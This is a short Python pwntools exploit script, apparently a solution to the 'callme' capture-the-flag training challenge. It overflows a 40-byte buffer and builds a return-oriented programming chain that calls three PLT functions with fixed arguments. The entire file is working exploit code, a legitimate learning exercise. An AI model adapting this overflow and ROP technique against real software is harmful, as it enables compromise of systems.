#!/usr/bin/env python3
from pwn import *

usefulGadgets = p64(0x000000000040093c)
#   pop rdi
#   pop rsi
#   pop rdx
#   ret

arg1 = p64(0xdeadbeefdeadbeef)
arg2 = p64(0xcafebabecafebabe)
arg3 = p64(0xd00df00dd00df00d)

callme_1_plt = p64(0x0000000000400720)
callme_2_plt = p64(0x0000000000400740)
callme_3_plt = p64(0x00000000004006f0)




prog = process('./callme')
payload = b''
for c in range(40):
    payload += b'a'

payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_1_plt

payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_2_plt

payload += usefulGadgets
payload += arg1
payload += arg2
payload += arg3
payload += callme_3_plt




payload += b"\n"
prog.sendline(payload)
sleep(1)
print(str(prog.recv(), 'UTF-8'))